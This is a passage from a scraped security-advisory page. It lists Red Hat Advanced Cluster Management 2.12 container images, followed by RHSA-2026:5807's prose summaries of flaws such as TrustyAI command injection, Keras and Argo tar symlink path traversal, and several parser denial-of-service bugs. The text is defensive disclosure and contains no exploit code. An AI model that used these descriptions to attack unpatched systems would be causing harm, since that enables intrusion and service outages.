"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:943de4b7c383fc679eac276a25ce6557336c95b92ebaa520bb74f8aee24115f5_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:6be8bc17e09b099a79437f27ded3d563814e3c6702dd9ed698f5f17b9fb3afa2_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:73c4ce25c2cc67fe3bec0cfc51e4c8b34929288f931f0f19c65bbbc969d0c588_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:128b74a18fb1fd1ba63f074d9d31e892a46048068608784f2696a4bbc7b57595_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:6b3fd2f8e3a164670dbbc59fd8c77057f98d97c0ba6ed7975711923e8acabb78_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:7c8de9466fee7334af1fef5647c4abaf9bd6b6012c301bb5c3c6a630cdc1dded_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:bbd945e3d0f92c8dfeb5601d7aa4d306f87e6facd9471a3c42f2582a264cd2ba_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:6a4fe92a913d7b778b8e756c618537c4a44aba7adc980355afcaf88b5cb871e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:b2563c07d52bd29574e0a896a2e72b90ff1144be31ec3dab9f89840be79936df_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:baacec8e68f6fcc0f4ee99f4405f80c560be369ec969a574534b01f43419a15d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:c7a24bf421728915b2e0cf3a7e803cbb18032959feab0cd2867b13f356136178_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:1f747a2fe3ee946ec3df5335c6527da41b84a92c1b7163e24b72809f958934a5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:699833b6f4ee8b8fdb45d5ed4a312972281576700a1a1d28dc0048d6c7188361_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b807be4db3f323ac57c1464843c1b7dc1479b24ac89dadd070813da75f282375_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/search-collector-rhel9@sha256:d1c112f5dd97d3415030ab12eb93006c04070f70176e89e2555b071d4b1dc881_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:a20f72f80173be40bbd330de88bc94d32e7596bf1b0fd76dd895b739f2df1c2e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:d815d7688e0ad3e0d9b20a73f418282ac47eb0c6a2721db959374ff9b5756918_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:dd779a5f1de2fb5b61333ef7d11642a4e8cbfcb745f3f0a4318e336f6fe4e5b6_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:f9e8be1fdc48039e3a46a09b9c1279d343a1fb48b987d0d2bdf7c4f0a720ca85_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:2fdcbd70cddfd8ef3d3211529434f24f69ff79fae57143e5ce66452a613b5c56_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:3d863c8706fca20261d46d0591ca2c18d34db98c5341136c840a80d0c285520c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:83eda40795e9b589114cddae252af2fc68ccf76b2a73522ad1094b2f84829be7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:e94fb4d6c912c989e11532bd86fe3a2eab5b17329fb3b11362be651609863a50_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: Axios affected by Denial of Service via __proto__ Key in mergeConfig"
}
]
}
RHSA-2026:5807
Vulnerability from csaf_redhat - Published: 2026-03-25 12:32 - Updated: 2026-04-16 11:09A local privilege escalation vulnerability has been discovered in containerd. This vulnerability is the result of an overly broad default permission which allows local users on the host to potentially access the metadata store, the content store and the contents of Kubernetes local volumes. The contents of volumes might include setuid binaries, which could allow a local user on the host to elevate privileges on the host.
A command injection vulnerability was discovered in the TrustyAI Explainability toolkit. Arbitrary commands placed in certain fields of a LMEValJob custom resource (CR) may be executed in the LMEvalJob pod's terminal. This issue can be exploited via a maliciously crafted LMEvalJob by a user with permissions to deploy a CR.
A path traversal flaw has been discovered in the keras Python library. when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python's tarfile.extractall function without the filter="data" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder.
A path traversal flaw has been discovered in Keras. The vulnerability arises because the function uses Python's tarfile.extractall() method without the security-critical filter='data' parameter. Although Keras attempts to filter unsafe paths using filter_safe_paths(), this filtering occurs before extraction, and a PATH_MAX symlink resolution bug triggers during extraction. This bug causes symlink resolution to fail due to path length limits, resulting in a security bypass that allows files to be written outside the intended extraction directory.
A flaw was found in node-forge. This vulnerability allows unauthenticated attackers to bypass downstream cryptographic verifications and security decisions via crafting ASN.1 (Abstract Syntax Notation One) structures to desynchronize schema validations, yielding a semantic divergence.
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
A flaw was found in golang. A remote attacker could exploit this vulnerability by providing a specially crafted certificate during the error string construction process within the `HostnameError.Error()` function. This flaw, caused by unbounded string concatenation, leads to excessive resource consumption. Successful exploitation can result in a denial of service (DoS) for the affected system.
An ASN.1 Denial of Service (Dos) vulnerability exists in the node-forge asn1.fromDer function within forge/lib/asn1.js. The ASN.1 DER parser implementation (_fromDer) recurses for every constructed ASN.1 value (SEQUENCE, SET, etc.) and lacks a guard limiting recursion depth. An attacker can craft a small DER blob containing a very large nesting depth of constructed TLVs which causes the Node.js V8 engine to exhaust its call stack and throw RangeError: Maximum call stack size exceeded, crashing or incapacitating the process handling the parse. This is a remote, low-cost Denial-of-Service against applications that parse untrusted ASN.1 objects.
A flaw was found in urllib3 Python library that could lead to a Denial of Service condition. A remote, malicious server can exploit this flaw by responding to a client request with an HTTP message that uses an excessive number of chained compression algorithms. This unlimited decompression chain causes the client system to consume a virtually unbounded amount of CPU resources and memory. The high resource usage leads to service disruption, making the application unresponsive.
A path traversal and arbitrary file overwrite vulnerability has been identified in Argo Workflows during the extraction of archived artifacts, where symbolic links inside a crafted archive are not safely validated before file extraction. An attacker could exploit this flaw by submitting a malicious archive containing symbolic links that point outside the intended extraction directory, causing files to be written or overwritten in unintended locations within the workflow pod. Successful exploitation may allow an attacker to overwrite execution control files and achieve arbitrary command execution during pod startup.
A flaw was found in Expr, an expression language and expression evaluation for Go. This vulnerability allows a denial of service (DoS) via recursive traversal over user-provided deeply nested or cyclic data structures without enforcing a maximum recursion depth, leading to a stack overflow panic and application crash.
A flaw was found in ajv. When the $data option is enabled, the value of the pattern keyword is passed directly to the JavaScript RegExp() constructor without sufficient validation. An attacker able to supply a malicious regular expression pattern can trigger a ReDoS (Regular Expression Denial of Service), causing the application to become unresponsive and resulting in a denial of service.
A flaw was found in undici. A remote attacker can exploit this vulnerability by sending a specially crafted compressed frame, known as a "decompression bomb," during permessage-deflate decompression. The undici WebSocket client does not properly limit the size of decompressed data, leading to unbounded memory consumption. This can cause the Node.js process to exhaust available memory, resulting in a denial of service (DoS) where the process crashes or becomes unresponsive.
A flaw was found in undici. A remote attacker could exploit this vulnerability by sending a specially crafted WebSocket frame with an extremely large 64-bit length. This causes undici's ByteParser to overflow its internal calculations, leading to an invalid state and a fatal TypeError. The primary consequence is a Denial of Service (DoS), which terminates the process.
A flaw was found in the undici WebSocket client. A remote malicious server can exploit this vulnerability by sending a WebSocket frame with an invalid `server_max_window_bits` parameter within the permessage-deflate extension. This improper validation causes the client's Node.js process to terminate, leading to a denial-of-service (DoS) condition for the client.
A flaw was found in Fastify, a web framework for Node.js. A remote attacker can exploit a validation bypass vulnerability by appending a tab character followed by arbitrary content to the Content-Type header. This circumvents the request body validation schemas, allowing the server to process the body as the original content type without proper validation. This could lead to unexpected data processing and potential integrity impact.
A denial of service flaw has been discovered in the Axios npm package. the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service.
A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application's failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.
A denial of service flaw has been discovered in the flatted npm library. flatted's parse() function uses a recursive revive() phase to resolve circular references in deserialized JSON. When given a crafted payload with deeply nested or self-referential $ indices, the recursion depth is unbounded, causing a stack overflow that crashes the Node.js process.
| URL | Category | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"document": {
